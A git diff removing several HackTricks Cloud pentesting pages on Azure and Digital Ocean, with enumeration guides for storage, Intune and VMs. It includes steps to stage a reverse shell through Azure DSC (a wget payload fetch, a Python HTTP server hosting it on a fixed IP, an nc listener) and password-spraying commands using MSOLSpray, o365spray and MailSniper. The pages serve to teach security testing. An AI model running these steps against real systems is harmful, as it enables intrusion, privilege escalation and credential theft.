-{% endhint %} - -**Check the complete post in:** [**https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe**](https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe) - -### Summary of Remote Server (C2) Infrastructure Preparation and Steps - -#### Overview - -The process involves setting up a remote server infrastructure to host a modified Nishang `Invoke-PowerShellTcp.ps1` payload, named `RevPS.ps1`, designed to bypass Windows Defender. The payload is served from a Kali Linux machine with IP `40.84.7.74` using a simple Python HTTP server. The operation is executed through several steps: - -#### Step 1 — Create Files - -* **Files Required:** Two PowerShell scripts are needed: - 1. `reverse_shell_config.ps1`: A Desired State Configuration (DSC) file that fetches and executes the payload. It is obtainable from [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/reverse_shell_config.ps1). - 2. `push_reverse_shell_config.ps1`: A script to publish the configuration to the VM, available at [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/push_reverse_shell_config.ps1). -* **Customization:** Variables and parameters in these files must be tailored to the user's specific environment, including resource names, file paths, and server/payload identifiers. - -#### Step 2 — Zip Configuration File - -* The `reverse_shell_config.ps1` is compressed into a `.zip` file, making it ready for transfer to the Azure Storage Account. - -```powershell -Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip -``` - -#### Step 3 — Set Storage Context & Upload - -* The zipped configuration file is uploaded to a predefined Azure Storage container, azure-pentest, using Azure's Set-AzStorageBlobContent cmdlet. - -```powershell -Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx -``` - -#### Step 4 — Prep Kali Box - -* The Kali server downloads the RevPS.ps1 payload from a GitHub repository. - -```bash -wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1 -``` - -* The script is edited to specify the target Windows VM and port for the reverse shell. - -#### Step 5 — Publish Configuration File - -* The configuration file is executed, resulting in the reverse-shell script being deployed to the specified location on the Windows VM. - -#### Step 6 — Host Payload and Setup Listener - -* A Python SimpleHTTPServer is started to host the payload, along with a Netcat listener to capture incoming connections. - -```bash -sudo python -m SimpleHTTPServer 80 -sudo nc -nlvp 443 -``` - -* The scheduled task executes the payload, achieving SYSTEM-level privileges. - -#### Conclusion - -The successful execution of this process opens numerous possibilities for further actions, such as credential dumping or expanding the attack to multiple VMs. The guide encourages continued learning and creativity in the realm of Azure Automation DSC. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md b/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md deleted file mode 100644 index b2479b6bc..000000000 --- a/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md +++ /dev/null @@ -1,86 +0,0 @@ -# Az - Management Groups, Subscriptions & Resource Groups - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Management Groups - -You can find more info about Management Groups in: - -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} - -### Enumeration - -```bash -# List -az account management-group list -# Get details and management groups and subscriptions that are children -az account management-group show --name --expand --recurse -``` - -## Subscriptions - -You can find more info about Subscriptions in: - -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} - -### Enumeration - -{% code overflow="wrap" %} -```bash -# List all subscriptions -az account list --output table -# Get details -az account management-group subscription show --name --subscription -``` -{% endcode %} - -## Resource Groups - -You can find more info about Resource Groups in: - -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} - -### Enumeration - -{% code overflow="wrap" %} -```bash -# List all resource groups -az group list -# Get resource groups of specific subscription -az group list --subscription "" --output table -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-queue-enum.md b/pentesting-cloud/azure-security/az-services/az-queue-enum.md deleted file mode 100644 index 03b3918bc..000000000 --- a/pentesting-cloud/azure-security/az-services/az-queue-enum.md +++ /dev/null @@ -1,117 +0,0 @@ -# Az - Queue Storage - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Azure Queue Storage is a service in Microsoft's Azure cloud platform designed for message queuing between application components, **enabling asynchronous communication and decoupling**. It allows you to store an unlimited number of messages, each up to 64 KB in size, and supports operations such as creating and deleting queues, adding, retrieving, updating, and deleting messages, as well as managing metadata and access policies. While it typically processes messages in a first-in-first-out (FIFO) manner, strict FIFO is not guaranteed. - -### Enumeration - -{% tabs %} -{% tab title="Az Cli" %} -```bash -# You need to know the --account-name of the storage (az storage account list) -az storage queue list --account-name - -# Queue Metadata -az storage queue metadata show --name --account-name - -#Get ACL -az storage queue policy list --queue-name --account-name - -# Get Messages (getting a message deletes it) -az storage message get --queue-name --account-name - -# Peek Messages -az storage message peek --queue-name --account-name -``` -{% endtab %} - -{% tab title="Az PS" %} -```bash -# Get the Storage Context -$storageAccount = Get-AzStorageAccount -ResourceGroupName QueueResourceGroup -Name queuestorageaccount1994 -$ctx = $storageAccount.Context - -# Set Variables for Storage Account -$storageAccountName = "queuestorageaccount" - -# List Queues -Get-AzStorageQueue -Context $context -$queueName = "myqueue" - -# Retrieve a specific queue -$queue = Get-AzStorageQueue -Name $queueName -Context $context -$queue # Show the properties of the queue - -# Retrieve the access policies for the queue -$accessPolicies = Get-AzStorageQueueStoredAccessPolicy -Context $context -QueueName $queueName -$accessPolicies - -# Peek Messages -$queueMessage = $queue.QueueClient.PeekMessage() -$queueMessage.Value - -# Set the amount of time you want to entry to be invisible after read from the queue -# If it is not deleted by the end of this time, it will show up in the queue again -$visibilityTimeout = [System.TimeSpan]::FromSeconds(10) - -# Read the messages from the queue, then show the contents of the messages. -$queueMessage = $queue.QueueClient.ReceiveMessages(1,$visibilityTimeout) -$queueMessage.Value -``` -{% endtab %} -{% endtabs %} - -### Privilege Escalation - -{% content-ref url="../az-privilege-escalation/az-queue-privesc.md" %} -[az-queue-privesc.md](../az-privilege-escalation/az-queue-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../az-post-exploitation/az-queue-post-exploitation.md" %} -[az-queue-post-exploitation.md](../az-post-exploitation/az-queue-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../az-persistence/az-queue-persistance.md" %} -[az-queue-persistance.md](../az-persistence/az-queue-persistance.md) -{% endcontent-ref %} - -## References - -* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues -* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api -* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-table-storage.md b/pentesting-cloud/azure-security/az-services/az-table-storage.md deleted file mode 100644 index 1b7b3e923..000000000 --- a/pentesting-cloud/azure-security/az-services/az-table-storage.md +++ /dev/null @@ -1,137 +0,0 @@ -# Az - Table Storage - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Azure Table Storage** is a NoSQL key-value store designed for storing large volumes of structured, non-relational data. It offers high availability, low latency, and scalability to handle large datasets efficiently. Data is organized into tables, with each entity identified by a partition key and row key, enabling fast lookups. It supports features like encryption at rest, role-based access control, and shared access signatures for secure, managed storage suitable for a wide range of applications. - -There **isn't built-in backup mechanism** for table storage. - -### Keys - -#### **PartitionKey** - -* The **PartitionKey groups entities into logical partitions**. Entities with the same PartitionKey are stored together, which improves query performance and scalability. -* Example: In a table storing employee data, `PartitionKey` might represent a department, e.g., `"HR"` or `"IT"`. - -#### **RowKey** - -* The **RowKey is the unique identifier** for an entity within a partition. When combined with the PartitionKey, it ensures that each entity in the table has a globally unique identifier. -* Example: For the `"HR"` partition, `RowKey` might be an employee ID, e.g., `"12345"`. - -#### **Other Properties (Custom Properties)** - -* Besides the PartitionKey and RowKey, an entity can have additional **custom properties to store data**. These are user-defined and act like columns in a traditional database. -* Properties are stored as **key-value pairs**. -* Example: `Name`, `Age`, `Title` could be custom properties for an employee. - -## Enumeration - -{% tabs %} -{% tab title="az cli" %} -{% code overflow="wrap" %} -```bash -# Get storage accounts -az storage account list - -# List tables -az storage table list --account-name - -# Read table -az storage entity query \ - --account-name \ - --table-name \ - --top 10 - -# Write table -az storage entity insert \ - --account-name \ - --table-name \ - --entity PartitionKey= RowKey= = - -# Write example -az storage entity insert \ - --account-name mystorageaccount \ - --table-name mytable \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" - -# Update row -az storage entity merge \ - --account-name mystorageaccount \ - --table-name mytable \ - --entity PartitionKey=pk1 RowKey=rk1 Age=31 -``` -{% endcode %} -{% endtab %} -{% tab title="PowerShell" %} -{% code overflow="wrap" %} -```powershell -# Get storage accounts -Get-AzStorageAccount - -# List tables -Get-AzStorageTable -Context (Get-AzStorageAccount -Name -ResourceGroupName ).Context -``` -{% endcode %} -{% endtab %} -{% endtabs %} - -{% hint style="info" %} -By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login`. -{% endhint %} - -{% hint style="success" %} -Use the param `--account-key` to indicate the account key to use\ -Use the param `--sas-token` with the SAS token to access via a SAS token -{% endhint %} - -## Privilege Escalation - -Same as storage privesc: - -{% content-ref url="../az-privilege-escalation/az-storage-privesc.md" %} -[az-storage-privesc.md](../az-privilege-escalation/az-storage-privesc.md) -{% endcontent-ref %} - -## Post Exploitation - -{% content-ref url="../az-post-exploitation/az-table-storage-post-exploitation.md" %} -[az-table-storage-post-exploitation.md](../az-post-exploitation/az-table-storage-post-exploitation.md) -{% endcontent-ref %} - -## Persistence - -Same as storage persistence: - -{% content-ref url="../az-persistence/az-storage-persistence.md" %} -[az-storage-persistence.md](../az-persistence/az-storage-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/intune.md b/pentesting-cloud/azure-security/az-services/intune.md deleted file mode 100644 index 1c5274e15..000000000 --- a/pentesting-cloud/azure-security/az-services/intune.md +++ /dev/null @@ -1,57 +0,0 @@ -# Az - Intune - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Microsoft Intune is designed to streamline the process of **app and device management**. Its capabilities extend across a diverse range of devices, encompassing mobile devices, desktop computers, and virtual endpoints. The core functionality of Intune revolves around **managing user access and simplifying the administration of applications** and devices within an organization's network. - -## Cloud -> On-Prem - -A user with **Global Administrator** or **Intune Administrator** role can execute **PowerShell** scripts on any **enrolled Windows** device.\ -The **script** runs with **privileges** of **SYSTEM** on the device only once if it doesn't change, and from Intune it's **not possible to see the output** of the script. - -```powershell -Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'" -``` - -1. Login into [https://endpoint.microsoft.com/#home](https://endpoint.microsoft.com/#home) or use Pass-The-PRT -2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune -3. Go to **Scripts** and click on **Add** for Windows 10. -4. Add a **Powershell script** - * ![](<../../../.gitbook/assets/image (264).png>) -5. Specify **Add all users** and **Add all devices** in the **Assignments** page. - -The execution of the script can take up to **one hour**. - -## References - -* [https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune](https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md deleted file mode 100644 index b48b2dcea..000000000 --- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md +++ /dev/null @@ -1,33 +0,0 @@ -# Az - Device Code Authentication Phishing - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Check:** [**https://o365blog.com/post/phishing/**](https://o365blog.com/post/phishing/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md deleted file mode 100644 index 2ffc070e9..000000000 --- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md +++ /dev/null @@ -1,61 +0,0 @@ -# Az - Password Spraying - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Password Spray - -In **Azure** this can be done against **different API endpoints** like Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, etc. - -However, note that this technique is **very noisy** and Blue Team can **easily catch it**. Moreover, **forced password complexity** and the use of **MFA** can make this technique kind of useless. - -You can perform a password spray attack with [**MSOLSpray**](https://github.com/dafthack/MSOLSpray) - -```powershell -. .\MSOLSpray\MSOLSpray.ps1 -Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose -``` - -Or with [**o365spray**](https://github.com/0xZDH/o365spray) - -```bash -python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com -``` - -Or with [**MailSniper**](https://github.com/dafthack/MailSniper) - -```powershell -#OWA -Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt -#EWS -Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt -#Gmail -Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md deleted file mode 100644 index 2d7ddc48f..000000000 --- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md +++ /dev/null @@ -1,69 +0,0 @@ -# Az - VMs Unath - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Virtual Machines - -For more info about Azure Virtual Machines check: - -{% content-ref url="../az-services/vms/" %} -[vms](../az-services/vms/) -{% endcontent-ref %} - -### Exposed vulnerable service - -A network service that is vulnerable to some RCE. - -### Public Gallery Images - -A public image might have secrets inside of it: - -{% code overflow="wrap" %} -```bash -# List all community galleries -az sig list-community --output table - -# Search by publisherUri -az sig list-community --output json --query "[?communityMetadata.publisherUri=='https://3nets.io']" -``` -{% endcode %} - -### Public Extensions - -This would be more weird but not impossible. A big company might put an extension with sensitive data inside of it: - -```bash -# It takes some mins to run -az vm extension image list --output table - -# Get extensions by publisher -az vm extension image list --publisher "Site24x7" --output table -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/README.md b/pentesting-cloud/digital-ocean-pentesting/README.md deleted file mode 100644 index 66f82c478..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/README.md +++ /dev/null @@ -1,67 +0,0 @@ -# Digital Ocean Pentesting - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Before start pentesting** a Digital Ocean environment there are a few **basics things you need to know** about how DO works to help you understand what you need to do, how to find misconfigurations and how to exploit them. - -Concepts such as hierarchy, access and other basic concepts are explained in: - -{% content-ref url="do-basic-information.md" %} -[do-basic-information.md](do-basic-information.md) -{% endcontent-ref %} - -## Basic Enumeration - -### SSRF - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} - -### Projects - -To get a list of the projects and resources running on each of them from the CLI check: - -{% content-ref url="do-services/do-projects.md" %} -[do-projects.md](do-services/do-projects.md) -{% endcontent-ref %} - -### Whoami - -```bash -doctl account get -``` - -## Services Enumeration - -{% content-ref url="do-services/" %} -[do-services](do-services/) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md b/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md deleted file mode 100644 index 3333a417c..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md +++ /dev/null @@ -1,33 +0,0 @@ -# DO - Permissions for a Pentest - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
